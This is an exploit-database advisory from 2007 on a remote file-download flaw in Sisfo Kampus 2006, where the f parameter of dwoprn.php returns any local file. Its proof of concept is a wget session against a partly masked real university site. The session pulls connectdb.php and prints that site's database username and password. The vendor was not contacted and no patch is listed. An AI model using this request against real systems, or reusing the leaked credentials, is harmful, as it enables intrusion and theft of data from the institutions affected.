[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Sisfo Kampus 2006 (dwoprn.php f) Remote File Download Vulnerability
# Published : 2007-09-10
# Author : k-one
# Previous Title : X-Cart <= ? Multiple Remote File Inclusion Vulnerabilities
# Next Title : phpRealty 0.02 (MGR) Multiple Remote File Inclusion Vulnerabilities
original File name : PUPET-SisfoKampus2006.txt
date releases : September 10, 2007
Information :
=========================
Advisory Name: Sisfo Kampus 2006 Local File Downloaded Vulnerability
Author: k-one A.K.A PUPET
Website vendor : http://sisfokampus.net/
Problem : All Local File can downloaded
POC :
=========================
http://[h0sT]/[dir]/dwoprn.php?f=connectdb.php
[pupet@vps ~]$ wget http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php
--07:30:16-- http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php
=> `dwoprn.php?f=connectdb.php'
Resolving ***.*****-subang.ac.id... 203.130.***.**
Connecting to siak.universitas-subang.ac.id[203.130.***.**]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 292 [application/dwoprn]
100%[====================================================================================================================================================================>] 292 --.--K/s
07:30:22 (2.78 MB/s) - `dwoprn.php?f=connectdb.php' saved [292/292]
[pupet@vps ~]$ cat dwoprn.php?f=connectdb.php
<?php
// file: connectdb.php
// author: E. Setio Dewo, Maret 2003
$db_username = "t26924_siak";
$db_hostname = "localhost";
$db_password = "siakang";
$db_name = "t26924_siak";
$con = _connect($db_hostname, $db_username, $db_password);
$db = _select_db($db_name, $con);
?>
Vendor Response:
==============
Not contacted yet
Patch :
=============
No Patch Available
This bugs Discover by : k-one A.K.A PUPET (Join our community at irc.indoirc.net #safana)
# www.Syue.com [2007-09-10]